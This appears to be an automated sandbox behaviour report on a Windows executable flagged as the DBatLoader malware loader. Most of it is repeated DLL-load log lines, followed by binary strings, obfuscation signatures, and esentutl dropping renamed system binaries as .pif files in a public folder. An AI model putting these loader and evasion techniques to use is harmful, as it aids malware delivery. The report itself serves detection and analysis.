Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\nft438A5fN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: nft438A5fN.exe

Static file information: File size 1244672 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 0.2.nft438A5fN.exe.23465a8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE

Binary contains a suspicious time stamp

Source: alpha.pif.5.dr

Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02CA894C

PE file contains sections with non-standard names

Source: alpha.pif.5.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C963AE push 02C9640Bh; ret	0_2_02C96403
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C963B0 push 02C9640Bh; ret	0_2_02C96403
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9C349 push 8B02C9C1h; ret	0_2_02C9C34E
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBC378 push 02CBC56Eh; ret	0_2_02CBC566
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C96782 push 02C967C6h; ret	0_2_02C967BE
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C96784 push 02C967C6h; ret	0_2_02C967BE
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D6E716 push ecx; ret	0_2_02D6E729
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D4C446 push ecx; ret	0_2_02D4C459
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9C56C push ecx; mov dword ptr [esp], edx	0_2_02C9C571
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBC570 push 02CBC56Eh; ret	0_2_02CBC566
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA8AD8 push 02CA8B10h; ret	0_2_02CA8B08
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CAAADF push 02CAAB18h; ret	0_2_02CAAB10
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CAAAE0 push 02CAAB18h; ret	0_2_02CAAB10
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D04A50 push eax; ret	0_2_02D04B20
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9CBEC push 02C9CD72h; ret	0_2_02C9CD6A
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9CBE3 push 02C9CD72h; ret	0_2_02C9CD6A
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA886C push 02CA88AEh; ret	0_2_02CA88A6
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA6948 push 02CA69F3h; ret	0_2_02CA69EB
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA6946 push 02CA69F3h; ret	0_2_02CA69EB
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA2F60 push 02CA2FD6h; ret	0_2_02CA2FCE
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBD2FC push 02CBD367h; ret	0_2_02CBD35F
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9332C push eax; ret	0_2_02C93368
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBD0AC push 02CBD125h; ret	0_2_02CBD11D
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA306B push 02CA30B9h; ret	0_2_02CA30B1
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA306C push 02CA30B9h; ret	0_2_02CA30B1
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02D6F038 push eax; ret	0_2_02D6F056
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBD1F8 push 02CBD288h; ret	0_2_02CBD280
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CBD144 push 02CBD1ECh; ret	0_2_02CBD1E4
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CAF108 push ecx; mov dword ptr [esp], edx	0_2_02CAF10D
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C9D5A0 push 02C9D5CCh; ret	0_2_02C9D5C4
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02CA790C push 02CA7989h; ret	0_2_02CA7981

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
